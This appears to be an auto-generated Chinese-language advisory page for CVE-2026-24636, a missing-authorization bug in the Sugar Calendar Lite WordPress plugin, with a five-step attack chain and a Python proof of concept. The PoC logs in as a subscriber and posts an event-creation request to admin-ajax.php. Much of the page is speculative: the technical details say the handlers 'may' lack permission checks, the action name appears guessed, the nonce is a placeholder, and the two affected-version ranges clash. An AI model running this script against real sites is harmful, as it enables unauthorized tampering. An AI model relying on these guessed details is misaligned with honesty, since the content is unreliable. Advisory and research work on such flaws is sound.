CVE-2026-24636 CVSS 4.3 中危

CVE-2026-24636 Sugar Calendar Lite 缺失授权漏洞

披露日期: 2026-01-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24636

漏洞类型

缺失授权/访问控制

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Sugar Calendar (Lite) WordPress Plugin

漏洞概述

CVE-2026-24636是WordPress插件Sugar Calendar Lite中的一个中等严重性授权缺失漏洞。该漏洞存在于Sugar Calendar Lite插件的访问控制机制中，允许具有低权限（如订阅者角色）的认证用户访问本应需要更高级别权限才能执行的操作。攻击者可利用此漏洞进行未授权的日历事件管理操作，包括创建、修改或删除日历事件。此漏洞的危险之处在于它利用了WordPress插件中常见的访问控制配置错误，攻击者只需拥有基本的账户登录凭证即可实施攻击，而不需要管理员权限。

技术细节

该漏洞属于Broken Access Control（访问控制失效）类别，具体表现为插件未能正确验证用户权限。在Sugar Calendar Lite插件中，某些敏感操作（如事件管理功能）缺少适当的权限检查。攻击者可以利用WordPress标准的用户角色和权限系统，通过低权限账户访问本应需要编辑者或管理员权限的功能。技术层面上，插件的AJAX处理器或REST API端点可能未包含current_user_can()或类似的权限验证函数，导致任何认证用户都能执行管理操作。

攻击链分析

STEP 1

侦察

攻击者识别运行Sugar Calendar Lite插件的WordPress站点

STEP 2

账户创建

攻击者注册一个低权限用户账户（如订阅者角色）

STEP 3

漏洞识别

攻击者发现插件的AJAX端点缺少权限验证

STEP 4

利用

通过低权限账户发送请求，执行未授权的管理操作

STEP 5

持久化

创建恶意事件或修改现有事件以维持访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# WordPress目标站点
target_url = 'http://target-wordpress-site.com'

# 低权限用户凭证
username = 'subscriber_user'
password = 'user_password'

# 登录获取认证cookie
session = requests.Session()
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In'
}

# 获取WordPress nonce用于后续请求
session.post(f'{target_url}/wp-login.php', data=login_data)

# 利用缺失的授权漏洞创建新事件
event_data = {
    'action': 'sugar_calendar_add_event',
    'title': 'Malicious Event',
    'description': 'Unauthorized event created via broken access control',
    'nonce': 'attacker_obtained_nonce'
}

response = session.post(
    f'{target_url}/wp-admin/admin-ajax.php',
    data=event_data
)

print(f'Event creation response: {response.status_code}')
print(response.text)

影响范围

Sugar Calendar Lite <= 3.9.1

Sugar Calendar Lite <= 3.10.1

防御指南

临时缓解措施

立即更新插件至修补版本，并审计用户权限配置

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表